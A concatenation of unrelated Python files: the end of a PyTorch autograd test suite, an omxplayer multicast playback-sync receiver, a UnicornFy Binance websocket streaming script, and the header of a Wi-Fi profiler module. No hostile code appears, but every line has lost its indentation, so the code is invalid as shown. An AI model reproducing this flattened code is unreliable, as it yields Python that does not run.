# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastible shapes and scalar.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
# Just make sure the op doesn't raise an error
# and resulting tensor has requires_grad=False.
x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
out = torch.isin(x, torch.tensor([2, 3], device=device))
self.assertFalse(out.requires_grad)
x = torch.randn(3, 3, requires_grad=True)
out = torch.signbit(x)
self.assertFalse(out.requires_grad)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
class PropagatingThread(threading.Thread):
'''Helper class to propagate exception from child
thread to main thread on join.
Reference: https://stackoverflow.com/a/31614591/5602957
'''
def run(self):
self.exception = None
try:
self.ret = super(PropagatingThread, self).run()
except Exception as e:
self.exception = e
def join(self, timeout=None):
super(PropagatingThread, self).join(timeout)
if self.exception:
raise self.exception from self.exception
return self.ret
threads = []
for _ in range(num_threads):
p = PropagatingThread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_multithreaded_exception_propagation(self):
# Test whether exception in child thread
# are propagated to main thread.
def fn():
self.assertTrue(False)
with self.assertRaises(AssertionError):
self._run_py_multithread_fn(fn)
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
def registers_hooks_for_each_thread():
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
x = torch.ones(5, 5, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
y = x * x
# should raise two warnings from x being saved twice
self.assertEqual(len(w), 2)
y.sum().backward()
def test_dataparallel_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
_self = self
class Model(torch.nn.Module):
def forward(self, x):
with warnings.catch_warnings(record=True) as w:
y = x * x
if torch.cuda.device_count() >= 2:
# DataParallel is calling the forward in different threads
# without progating TLS, so hooks should not be called here
_self.assertEqual(len(w), 0)
else:
# DataParallel only uses one thread
# so hooks should be called here
_self.assertGreater(len(w), 0)
x = torch.ones(5, 5, requires_grad=True)
model = torch.nn.DataParallel(Model())
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
model(x)
with warnings.catch_warnings(record=True) as w:
y = x * x
# hooks should be called here
_self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Import test cases from below autograd/ here. These are found
# implicitly by the loader, so Flake8 thinks they are unused, hence
# the suppressions.
from autograd.test_complex import TestAutogradComplex # noqa: F401
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
receiver.py
|
import socket
import struct
from dbus import DBusException
import collections
from threading import Thread
from time import sleep
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 1666
DEFAULT_MULICAST = '224.0.0.160'
DEFAULT_BIG_TOLERANCE = 3 # amount of deviation above which a large sync should be performed
DEFAULT_TOLERANCE = .05 # margin that is considered acceptable for slave to be ahead or behind
DEFAULT_GRACE_TIME = 3 # amount of time to wait with re-syncs after a resync
class Receiver:
def __init__(self, omxplayer, verbose=False, big_tolerance=DEFAULT_BIG_TOLERANCE, tolerance=DEFAULT_TOLERANCE,
grace_time=DEFAULT_GRACE_TIME, host=DEFAULT_HOST, port=DEFAULT_PORT, multicast=DEFAULT_MULICAST,
background=True, interface=None):
# config
self.player = omxplayer
self.verbose = verbose if type(verbose) is bool else False
self.big_tolerance = big_tolerance if type(big_tolerance) in (int, float) else DEFAULT_BIG_TOLERANCE
self.tolerance = tolerance if type(tolerance) in (int, float) else DEFAULT_TOLERANCE
self.grace_time = grace_time if type(grace_time) in (int, float) else DEFAULT_GRACE_TIME
self.host = self.test_host(host, DEFAULT_HOST)
self.port = port if type(port) is int else DEFAULT_PORT
self.multicast = self.test_host(multicast, DEFAULT_MULICAST)
self.background = background if type(background) is bool else True
self.interface = interface
# attributes
self.socket = None
self.received_position = None
self.received_duration = None
self.received_status = None
self.paused_until = None
self.deviation = 0
self.deviations = collections.deque(maxlen=10)
self.median_deviation = 0
self.duration_match = None
self.rate = 1
self.update_thread = None
self.message = " "
self.net_errors = 0
self.master_addr = None
self.setup()
if self.background is True:
self.start_thread()
def __del__(self):
self.destroy()
def test_host(self, host, default):
host_test = host.split('.', 3)
try:
all(int(item) for item in host_test)
if len(host_test) == 4:
return host
except:
return default
def setup(self):
# create socket connections
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# non-blocking, please
self.socket.setblocking(0)
# bind to configured host/port
self.socket.bind((self.host, self.port))
group = socket.inet_aton(self.multicast)
mreq = struct.pack('4sl', group, socket.INADDR_ANY)
if self.interface is not None:
self.socket.setsockopt(socket.SOL_SOCKET, 25, self.interface)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
if self.verbose:
print('Connection set up')
def start_thread(self):
self.update_thread = Thread(target=self.update_loop)
self.update_thread.start()
def destroy(self):
if self.socket:
self.socket.close()
self.socket = None
def update_loop(self):
while True:
try:
self.update()
except DBusException:
self.socket.close()
break
def update(self):
# keep receiving data so don't get whole batch of data later
data = self._receive_data()
local_pos = self.player.position()
if local_pos is None: # we'll need our own local position
return
local_status = self.player.playback_status()
if local_status is None:
return
# no data? no action.
if not data:
return
# store received data
self.received_position = float(data[0])
self.received_duration = float(data[1])
self.received_status = data[2]
if local_status != self.received_status:
self.player.play_pause()
if self.received_status == 'Paused':
return
# calculate current deviation based on newly received master position
self.deviation = self.received_position - local_pos
self.message = 'Master: %.2f/%.2f (deviation: %.2f, %s, rate: %s)' % \
(self.received_duration, self.received_position, self.deviation, local_status, self.rate)
if self.verbose:
print(self.message)
# check file; if master is playing a different file, then there is no use in time-syncing
if self.duration_match is None:
if abs(self.received_duration - float(self.player.duration())) > 1:
print('Error: durations of files does not match! Master:{} Slave:{}'.format(self.received_duration, self.player.duration()))
return
else:
self.duration_match = True
# calculate median deviation
self.deviations.append(self.deviation)
self.median_deviation = self._calculate_median(list(self.deviations))
if self.verbose:
print('PositionReceiver.median_deviation: ' + str(self.median_deviation))
# still at start or end of video, don't sync
if self.received_position <= self.grace_time: # or self.player.position() <= self.grace_time:
return
if (self.received_duration - local_pos) < self.grace_time:
if self.rate != 1:
self._reset_small_sync()
return
# not deviated very much, nothing to sync
if abs(self.median_deviation) <= self.tolerance:
if self.rate != 1:
self._reset_small_sync()
return
# ok, let's do some syncing
self.deviations.clear()
if abs(self.median_deviation) >= self.big_tolerance:
self._perform_big_sync()
return
self._perform_small_sync()
def _receive_data(self):
try:
# read incoming socket data
data = self.socket.recv(1024)
pos, duration, playback_status = data.decode('utf-8').split('%', 2)
self.net_errors = 0
return (pos, duration, playback_status)
except Exception as e:
self.net_errors += 1
if self.net_errors > 20:
self.message = "Error: Network is unreachable"
if self.verbose:
print(self.message)
print(e)
return None
def _calculate_median(self, lst):
quotient, remainder = divmod(len(lst), 2)
if remainder:
return sorted(lst)[quotient]
return float(sum(sorted(lst)[quotient - 1:quotient + 1]) / 2.0)
def _perform_small_sync(self):
if self.deviation < 0 and self.rate > 0.98:
self.player.action(1)
elif self.deviation > 0 and self.rate < 1.24:
self.player.action(2)
self.rate = float(self.player.rate())
def _reset_small_sync(self):
if self.rate == 0.975:
self.player.action(2)
elif self.rate == 1.125:
self.player.action(1)
self.rate = float(self.player.rate())
def _perform_big_sync(self):
# jump to master position
self._reset_small_sync()
self.player.set_position(self.received_position)
if self.verbose:
print("jumped to position {0:2f}".format(self.received_position))
|
dev_stream_everything_and_unicorn_fy.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_stream_everything_and_unicorn_fy.py
#
# Part of ‘UnicornFy’
# Project website: https://www.lucit.tech/unicorn-fy.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-fy
# Documentation: https://unicorn-fy.docs.lucit.tech/
# PyPI: https://pypi.org/project/unicorn-fy
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
from unicorn_fy.unicorn_fy import UnicornFy
import logging
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`!")
sys.exit(1)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.getLogger("unicorn_fy")
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is not False:
unicorn_fied_data = UnicornFy.binance_com_websocket(oldest_stream_data_from_stream_buffer)
print(str(unicorn_fied_data))
else:
time.sleep(0.01)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
markets = []
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["!userData"], ["arr"])
arr_stream_id = binance_websocket_api_manager.create_stream(arr_channels, "arr")
for channel in channels:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
stream_id_trade = binance_websocket_api_manager.get_stream_id_by_label("trade")
binance_websocket_api_manager.get_stream_subscriptions(stream_id_trade)
#while True:
# binance_websocket_api_manager.print_summary()
# time.sleep(1)
|
manager.py
|
# -*- coding: utf-8 -*-
#
# profiler2: a Wi-Fi client capability analyzer
# Copyright 2020 Josh Schmelzle
#
